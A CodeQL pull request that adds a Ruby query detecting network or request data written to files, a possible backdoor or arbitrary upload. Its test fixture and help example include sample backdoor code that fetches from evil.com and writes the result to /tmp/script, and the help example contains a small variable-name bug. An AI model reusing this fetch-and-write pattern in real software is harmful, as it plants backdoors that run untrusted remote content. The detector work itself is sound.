### PR TITLE
Ruby: Add rb/http-to-file-access query

### DIFF
--- a/config/identical-files.json
+++ b/config/identical-files.json
@@ -533,5 +533,13 @@
   "TaintedFormatStringCustomizations Ruby/JS": [
     "javascript/ql/lib/semmle/javascript/security/dataflow/TaintedFormatStringCustomizations.qll",
     "ruby/ql/lib/codeql/ruby/security/TaintedFormatStringCustomizations.qll"
+  ],
+  "HttpToFileAccessQuery JS/Ruby": [
+    "javascript/ql/lib/semmle/javascript/security/dataflow/HttpToFileAccessQuery.qll",
+    "ruby/ql/lib/codeql/ruby/security/HttpToFileAccessQuery.qll"
+  ],
+  "HttpToFileAccessCustomizations JS/Ruby": [
+    "javascript/ql/lib/semmle/javascript/security/dataflow/HttpToFileAccessCustomizations.qll",
+    "ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll"
   ]
 }

--- a/javascript/ql/lib/semmle/javascript/security/dataflow/HttpToFileAccessCustomizations.qll
+++ b/javascript/ql/lib/semmle/javascript/security/dataflow/HttpToFileAccessCustomizations.qll
@@ -3,6 +3,12 @@
  * writing user-controlled data to files, as well as extension points
  * for adding your own.
  */
+
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * writing user-controlled data to files, as well as extension points
+ * for adding your own.
+ */
 module HttpToFileAccess {
   import HttpToFileAccessSpecific
 

--- a/javascript/ql/lib/semmle/javascript/security/dataflow/HttpToFileAccessCustomizations.qll
+++ b/javascript/ql/lib/semmle/javascript/security/dataflow/HttpToFileAccessCustomizations.qll
@@ -3,11 +3,9 @@
  * writing user-controlled data to files, as well as extension points
  * for adding your own.
  */
-
-import javascript
-import semmle.javascript.security.dataflow.RemoteFlowSources
-
 module HttpToFileAccess {
+  import HttpToFileAccessSpecific
+
   /**
    * A data flow source for writing user-controlled data to files.
    */
@@ -22,18 +20,6 @@ module HttpToFileAccess {
    * A sanitizer for writing user-controlled data to files.
    */
   abstract class Sanitizer extends DataFlow::Node { }
-
-  /**
-   * An access to a user-controlled HTTP request input, considered as a flow source for writing user-controlled data to files
-   */
-  private class RequestInputAccessAsSource extends Source {
-    RequestInputAccessAsSource() { this instanceof HTTP::RequestInputAccess }
-  }
-
-  /** A response from a server, considered as a flow source for writing user-controlled data to files. */
-  private class ServerResponseAsSource extends Source {
-    ServerResponseAsSource() { this = any(ClientRequest r).getAResponseDataNode() }
-  }
 
   /** A sink that represents file access method (write, append) argument */
   class FileAccessAsSink extends Sink {

--- a/javascript/ql/lib/semmle/javascript/security/dataflow/HttpToFileAccessQuery.qll
+++ b/javascript/ql/lib/semmle/javascript/security/dataflow/HttpToFileAccessQuery.qll
@@ -6,8 +6,7 @@
  * `HttpToFileAccessCustomizations` should be imported instead.
  */
 
-import javascript
-import HttpToFileAccessCustomizations::HttpToFileAccess
+private import HttpToFileAccessCustomizations::HttpToFileAccess
 
 /**
  * A taint tracking configuration for writing user-controlled data to files.

--- a/javascript/ql/lib/semmle/javascript/security/dataflow/HttpToFileAccessSpecific.qll
+++ b/javascript/ql/lib/semmle/javascript/security/dataflow/HttpToFileAccessSpecific.qll
@@ -1,0 +1,19 @@
+/**
+ * Provides imports and classes needed for `HttpToFileAccessQuery` and `HttpToFileAccessCustomizations`.
+ */
+
+import javascript
+import semmle.javascript.security.dataflow.RemoteFlowSources
+private import HttpToFileAccessCustomizations::HttpToFileAccess
+
+/**
+ * An access to a user-controlled HTTP request input, considered as a flow source for writing user-controlled data to files
+ */
+private class RequestInputAccessAsSource extends Source {
+  RequestInputAccessAsSource() { this instanceof HTTP::RequestInputAccess }
+}
+
+/** A response from a server, considered as a flow source for writing user-controlled data to files. */
+private class ServerResponseAsSource extends Source {
+  ServerResponseAsSource() { this = any(ClientRequest r).getAResponseDataNode() }
+}

--- a/ruby/ql/lib/codeql/ruby/Concepts.qll
+++ b/ruby/ql/lib/codeql/ruby/Concepts.qll
@@ -291,6 +291,34 @@ module HTTP {
     }
 
     /**
+     * An access to a user-controlled HTTP request input. For example, the URL or body of a request.
+     * Instances of this class automatically become `RemoteFlowSource`s.
+     *
+     * Extend this class to refine existing API models. If you want to model new APIs,
+     * extend `RequestInputAccess::Range` instead.
+     */
+    class RequestInputAccess extends DataFlow::Node instanceof RequestInputAccess::Range {
+      string getSourceType() { result = super.getSourceType() }
+    }
+
+    /** Provides a class for modeling new HTTP request inputs. */
+    module RequestInputAccess {
+      /**
+       * An access to a user-controlled HTTP request input.
+       *
+       * Extend this class to model new APIs. If you want to refine existing API models,
+       * extend `RequestInputAccess` instead.
+       */
+      abstract class Range extends DataFlow::Node {
+        abstract string getSourceType();
+      }
+    }
+
+    private class RequestInputAccessAsRemoteFlowSource extends RemoteFlowSource::Range instanceof RequestInputAccess {
+      override string getSourceType() { result = this.(RequestInputAccess).getSourceType() }
+    }
+
+    /**
      * A function that will handle incoming HTTP requests.
      *
      * Extend this class to refine existing API models. If you want to model new APIs,
@@ -343,7 +371,7 @@ module HTTP {
     }
 
     /** A parameter that will receive parts of the url when handling an incoming request. */
-    private class RoutedParameter extends RemoteFlowSource::Range, DataFlow::ParameterNode {
+    private class RoutedParameter extends RequestInputAccess::Range, DataFlow::ParameterNode {
       RequestHandler handler;
 
       RoutedParameter() { this.getParameter() = handler.getARoutedParameter() }

--- a/ruby/ql/lib/codeql/ruby/Concepts.qll
+++ b/ruby/ql/lib/codeql/ruby/Concepts.qll
@@ -298,6 +298,11 @@ module HTTP {
      * extend `RequestInputAccess::Range` instead.
      */
     class RequestInputAccess extends DataFlow::Node instanceof RequestInputAccess::Range {
+      /**
+       * Gets a string that describes the type of this input.
+       *
+       *  This is typically the name of the method that gives rise to this input.
+       */
       string getSourceType() { result = super.getSourceType() }
     }
 
@@ -310,6 +315,11 @@ module HTTP {
        * extend `RequestInputAccess` instead.
        */
       abstract class Range extends DataFlow::Node {
+        /**
+         * Gets a string that describes the type of this input.
+         *
+         *  This is typically the name of the method that gives rise to this input.
+         */
         abstract string getSourceType();
       }
     }

--- a/ruby/ql/lib/codeql/ruby/Concepts.qll
+++ b/ruby/ql/lib/codeql/ruby/Concepts.qll
@@ -301,7 +301,7 @@ module HTTP {
       /**
        * Gets a string that describes the type of this input.
        *
-       *  This is typically the name of the method that gives rise to this input.
+       * This is typically the name of the method that gives rise to this input.
        */
       string getSourceType() { result = super.getSourceType() }
     }
@@ -318,7 +318,7 @@ module HTTP {
         /**
          * Gets a string that describes the type of this input.
          *
-         *  This is typically the name of the method that gives rise to this input.
+         * This is typically the name of the method that gives rise to this input.
          */
         abstract string getSourceType();
       }

--- a/ruby/ql/lib/codeql/ruby/frameworks/ActionController.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/ActionController.qll
@@ -11,6 +11,7 @@ private import codeql.ruby.ast.internal.Module
 private import codeql.ruby.ApiGraphs
 private import ActionView
 private import codeql.ruby.frameworks.ActionDispatch
+private import codeql.ruby.Concepts
 
 /**
  * A `ClassDeclaration` for a class that extends `ActionController::Base`.
@@ -126,7 +127,7 @@ abstract class ParamsCall extends MethodCall {
  * A `RemoteFlowSource::Range` to represent accessing the
  * ActionController parameters available via the `params` method.
  */
-class ParamsSource extends RemoteFlowSource::Range {
+class ParamsSource extends HTTP::Server::RequestInputAccess::Range {
   ParamsSource() { this.asExpr().getExpr() instanceof ParamsCall }
 
   override string getSourceType() { result = "ActionController::Metal#params" }
@@ -143,7 +144,7 @@ abstract class CookiesCall extends MethodCall {
  * A `RemoteFlowSource::Range` to represent accessing the
  * ActionController parameters available via the `cookies` method.
  */
-class CookiesSource extends RemoteFlowSource::Range {
+class CookiesSource extends HTTP::Server::RequestInputAccess::Range {
   CookiesSource() { this.asExpr().getExpr() instanceof CookiesCall }
 
   override string getSourceType() { result = "ActionController::Metal#cookies" }

--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
@@ -1,0 +1,37 @@
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * writing user-controlled data to files, as well as extension points
+ * for adding your own.
+ */
+
+import ruby
+import codeql.ruby.DataFlow
+import codeql.ruby.dataflow.RemoteFlowSources
+import codeql.ruby.Concepts
+
+module HttpToFileAccess {
+  /**
+   * A data flow source for writing user-controlled data to files.
+   */
+  abstract class Source extends DataFlow::Node { }
+
+  /**
+   * A data flow sink for writing user-controlled data to files.
+   */
+  abstract class Sink extends DataFlow::Node { }
+
+  /**
+   * A sanitizer for writing user-controlled data to files.
+   */
+  abstract class Sanitizer extends DataFlow::Node { }
+
+  /** A source of remote user input, considered as a flow source for writing user-controlled data to files. */
+  class RemoteFlowSourceAsSource extends Source {
+    RemoteFlowSourceAsSource() { this instanceof RemoteFlowSource }
+  }
+
+  /** A sink that represents file access method (write, append) argument */
+  class FileAccessAsSink extends Sink {
+    FileAccessAsSink() { exists(FileSystemWriteAccess src | this = src.getADataNode()) }
+  }
+}

--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
@@ -9,6 +9,11 @@ import codeql.ruby.DataFlow
 import codeql.ruby.dataflow.RemoteFlowSources
 import codeql.ruby.Concepts
 
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * writing user-controlled data to files, as well as extension points
+ * for adding your own.
+ */
 module HttpToFileAccess {
   /**
    * A data flow source for writing user-controlled data to files.
@@ -25,9 +30,15 @@ module HttpToFileAccess {
    */
   abstract class Sanitizer extends DataFlow::Node { }
 
-  /** A source of remote user input, considered as a flow source for writing user-controlled data to files. */
-  class RemoteFlowSourceAsSource extends Source {
-    RemoteFlowSourceAsSource() { this instanceof RemoteFlowSource }
+  /**
+   * An access to a user-controlled HTTP request input, considered as a flow source for writing user-controlled data to files
+   */
+  private class RequestInputAccessAsSource extends Source instanceof HTTP::Server::RequestInputAccess {
+  }
+
+  /** A response from an outgoing HTTP request, considered as a flow source for writing user-controlled data to files. */
+  private class HttpResponseAsSource extends Source {
+    HttpResponseAsSource() { this = any(HTTP::Client::Request r).getResponseBody() }
   }
 
   /** A sink that represents file access method (write, append) argument */

--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
@@ -3,18 +3,9 @@
  * writing user-controlled data to files, as well as extension points
  * for adding your own.
  */
-
-import ruby
-import codeql.ruby.DataFlow
-import codeql.ruby.dataflow.RemoteFlowSources
-import codeql.ruby.Concepts
-
-/**
- * Provides default sources, sinks and sanitizers for reasoning about
- * writing user-controlled data to files, as well as extension points
- * for adding your own.
- */
 module HttpToFileAccess {
+  import HttpToFileAccessSpecific
+
   /**
    * A data flow source for writing user-controlled data to files.
    */
@@ -29,17 +20,6 @@ module HttpToFileAccess {
    * A sanitizer for writing user-controlled data to files.
    */
   abstract class Sanitizer extends DataFlow::Node { }
-
-  /**
-   * An access to a user-controlled HTTP request input, considered as a flow source for writing user-controlled data to files
-   */
-  private class RequestInputAccessAsSource extends Source instanceof HTTP::Server::RequestInputAccess {
-  }
-
-  /** A response from an outgoing HTTP request, considered as a flow source for writing user-controlled data to files. */
-  private class HttpResponseAsSource extends Source {
-    HttpResponseAsSource() { this = any(HTTP::Client::Request r).getResponseBody() }
-  }
 
   /** A sink that represents file access method (write, append) argument */
   class FileAccessAsSink extends Sink {

--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
@@ -3,6 +3,12 @@
  * writing user-controlled data to files, as well as extension points
  * for adding your own.
  */
+
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * writing user-controlled data to files, as well as extension points
+ * for adding your own.
+ */
 module HttpToFileAccess {
   import HttpToFileAccessSpecific
 

--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessQuery.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessQuery.qll
@@ -1,0 +1,28 @@
+/**
+ * Provides a taint tracking configuration for reasoning about writing user-controlled data to files.
+ *
+ * Note, for performance reasons: only import this file if
+ * `HttpToFileAccess::Configuration` is needed, otherwise
+ * `HttpToFileAccessCustomizations` should be imported instead.
+ */
+
+import ruby
+import codeql.ruby.TaintTracking
+import codeql.ruby.DataFlow
+import codeql.ruby.security.HttpToFileAccessCustomizations::HttpToFileAccess
+
+/**
+ * A taint tracking configuration for writing user-controlled data to files.
+ */
+class Configuration extends TaintTracking::Configuration {
+  Configuration() { this = "HttpToFileAccess" }
+
+  override predicate isSource(DataFlow::Node source) { source instanceof Source }
+
+  override predicate isSink(DataFlow::Node sink) { sink instanceof Sink }
+
+  override predicate isSanitizer(DataFlow::Node node) {
+    super.isSanitizer(node) or
+    node instanceof Sanitizer
+  }
+}

--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessQuery.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessQuery.qll
@@ -6,10 +6,7 @@
  * `HttpToFileAccessCustomizations` should be imported instead.
  */
 
-import ruby
-import codeql.ruby.TaintTracking
-import codeql.ruby.DataFlow
-import codeql.ruby.security.HttpToFileAccessCustomizations::HttpToFileAccess
+private import HttpToFileAccessCustomizations::HttpToFileAccess
 
 /**
  * A taint tracking configuration for writing user-controlled data to files.

--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessSpecific.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessSpecific.qll
@@ -1,0 +1,21 @@
+/**
+ * Provides imports and classes needed for `HttpToFileAccessQuery` and `HttpToFileAccessCustomizations`.
+ */
+
+import ruby
+import codeql.ruby.DataFlow
+import codeql.ruby.dataflow.RemoteFlowSources
+import codeql.ruby.Concepts
+import codeql.ruby.TaintTracking
+private import HttpToFileAccessCustomizations::HttpToFileAccess
+
+/**
+ * An access to a user-controlled HTTP request input, considered as a flow source for writing user-controlled data to files
+ */
+private class RequestInputAccessAsSource extends Source instanceof HTTP::Server::RequestInputAccess {
+}
+
+/** A response from an outgoing HTTP request, considered as a flow source for writing user-controlled data to files. */
+private class HttpResponseAsSource extends Source {
+  HttpResponseAsSource() { this = any(HTTP::Client::Request r).getResponseBody() }
+}

--- a/ruby/ql/src/change-notes/2022-02-23-rb-http-to-file-access.md
+++ b/ruby/ql/src/change-notes/2022-02-23-rb-http-to-file-access.md
@@ -1,0 +1,4 @@
+---
+category: newQuery
+---
+* Added a new query, `rb/http-to-file-access`. The query finds cases where data from remote user input is written to a file.

--- a/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp
+++ b/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp
@@ -1,0 +1,43 @@
+<!DOCTYPE qhelp PUBLIC
+"-//Semmle//qhelp//EN"
+"qhelp.dtd">
+<qhelp>
+
+<overview>
+  <p>
+    Storing user-controlled data on the local file system without
+    further validation allows arbitrary file upload, and may be
+    an indication of malicious backdoor code that has been
+    implanted into an otherwise trusted code base.
+  </p>
+</overview>
+
+<recommendation>
+  <p>
+    Examine the highlighted code closely to ensure that it is
+    behaving as intended.
+  </p>
+</recommendation>
+
+<example>
+  <p>
+    The following example shows backdoor code that downloads data
+    from the URL <code>https://evil.com/script</code>, and stores
+    it in the local file <code>/tmp/script</code>.
+  </p>
+
+  <sample src="examples/http_to_file_access.rb"/>
+
+  <p>
+    Other parts of the program might then assume that since
+    <code>/tmp/script</code> is a local file its contents can be
+    trusted, while in fact they are obtained from an untrusted
+    remote source.
+  </p>
+</example>
+
+<references>
+  <li>OWASP: <a href="https://www.owasp.org/index.php/Trojan_Horse">Trojan Horse</a>.</li>
+  <li>OWASP: <a href="https://www.owasp.org/index.php/Unrestricted_File_Upload">Unrestricted File Upload</a>.</li>
+</references>
+</qhelp>

--- a/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.ql
+++ b/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.ql
@@ -1,0 +1,20 @@
+/**
+ * @name Network data written to file
+ * @description Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 6.3
+ * @precision medium
+ * @id rb/http-to-file-access
+ * @tags security
+ *       external/cwe/cwe-912
+ *       external/cwe/cwe-434
+ */
+
+import ruby
+import codeql.ruby.DataFlow::DataFlow::PathGraph
+import codeql.ruby.security.HttpToFileAccessQuery
+
+from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink
+where cfg.hasFlowPath(source, sink)
+select sink.getNode(), source, sink, "$@ flows to file system", source.getNode(), "Untrusted data"

--- a/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.ql
+++ b/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.ql
@@ -12,6 +12,7 @@
  */
 
 import ruby
+import codeql.ruby.DataFlow
 import codeql.ruby.DataFlow::DataFlow::PathGraph
 import codeql.ruby.security.HttpToFileAccessQuery
 

--- a/ruby/ql/src/queries/security/cwe-912/examples/http_to_file_access.rb
+++ b/ruby/ql/src/queries/security/cwe-912/examples/http_to_file_access.rb
@@ -1,0 +1,5 @@
+require "net/http"
+
+resp = Net::HTTP.new("evil.com").get("/script").body
+file = File.open("/tmp/script", "w")
+file.write(body)

--- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected
+++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected
@@ -1,0 +1,14 @@
+edges
+| http_to_file_access.rb:3:8:3:52 | call to body :  | http_to_file_access.rb:5:12:5:15 | resp |
+| http_to_file_access.rb:9:16:9:21 | call to params :  | http_to_file_access.rb:9:16:9:30 | ...[...] :  |
+| http_to_file_access.rb:9:16:9:30 | ...[...] :  | http_to_file_access.rb:11:18:11:23 | script |
+nodes
+| http_to_file_access.rb:3:8:3:52 | call to body :  | semmle.label | call to body :  |
+| http_to_file_access.rb:5:12:5:15 | resp | semmle.label | resp |
+| http_to_file_access.rb:9:16:9:21 | call to params :  | semmle.label | call to params :  |
+| http_to_file_access.rb:9:16:9:30 | ...[...] :  | semmle.label | ...[...] :  |
+| http_to_file_access.rb:11:18:11:23 | script | semmle.label | script |
+subpaths
+#select
+| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body :  | http_to_file_access.rb:5:12:5:15 | resp | $@ flows to file system | http_to_file_access.rb:3:8:3:52 | call to body | Untrusted data |
+| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params :  | http_to_file_access.rb:11:18:11:23 | script | $@ flows to file system | http_to_file_access.rb:9:16:9:21 | call to params | Untrusted data |

--- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref
+++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref
@@ -1,0 +1,1 @@
+queries/security/cwe-912/HttpToFileAccess.ql

--- a/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb
+++ b/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb
@@ -1,0 +1,19 @@
+require "net/http"
+
+resp = Net::HTTP.new("evil.com").get("/script").body
+file = File.open("/tmp/script", "w")
+file.write(resp) # BAD
+
+class ExampleController < ActionController::Base
+    def example
+      script = params[:script]
+      file = File.open("/tmp/script", "w")
+      file.write(script) # BAD
+    end
+
+    def example2
+      a = "a"
+      file = File.open("/tmp/script", "w")
+      file.write(a) # GOOD
+    end
+end


### PR DESCRIPTION
This is a direct port of the JS version. I've ported the concept `RequestInputAccess` from JS, which we didn't already have an equivalent for. I've also directly shared `HttpToFileAccessQuery` and `HttpToFileAccessCustomizations` between Ruby and JS. Language-specific imports and some classes that extend differently-named concepts have been moved to `HttpToFileAccessSpecific`.